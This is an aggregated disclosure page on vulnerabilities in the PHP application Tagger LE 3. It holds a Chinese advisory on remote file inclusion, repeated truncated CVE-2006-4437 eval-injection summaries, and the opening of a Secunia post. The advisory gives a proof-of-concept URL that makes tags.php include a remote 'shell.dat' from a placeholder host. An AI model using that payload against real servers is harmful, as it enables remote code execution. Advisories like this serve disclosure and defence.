Tagger LE Tags.PHP远程文件包含漏洞

Tagger LE是一款基于PHP的WEB应用程序。 Tagger LE不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'tags.php'脚本对用户提交的'BBCodeFile'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 Venture Nine Tagger LE 3 http://www.venturenine.com/ http://www.example.com/tags.php?BBCodeFile=http://www.example2.com/shell.dat?...

CVE-2006-4437

Eval injection vulnerability in Tagger LE allows remote attackers to execute arbitrary PHP code via the query string in 1 tags.php, 2 sign.php, and 3 admin/index.php...

CVE-2006-4437

The provided documents confirm CVE-2006-4437 in Tagger LE: an eval() injection vulnerability that allows remote attackers to execute arbitrary PHP code via crafted query string parameters in tags.php, sign.php, and admin/index.php. The root cause is unsanitised input being used directly inside an...

CVE-2006-4437

Eval injection vulnerability in Tagger LE allows remote attackers to execute arbitrary PHP code via the query string in 1 tags.php, 2 sign.php, and 3 admin/index.php...

[Full-disclosure] Secunia Research: Tagger LE PHP "eval()" Injection Vulnerabilities

====================================================================== Secunia Research 14/09/2006 - Tagger LE PHP "eval" Injection Vulnerabilities - ====================================================================== Table of Contents Affected...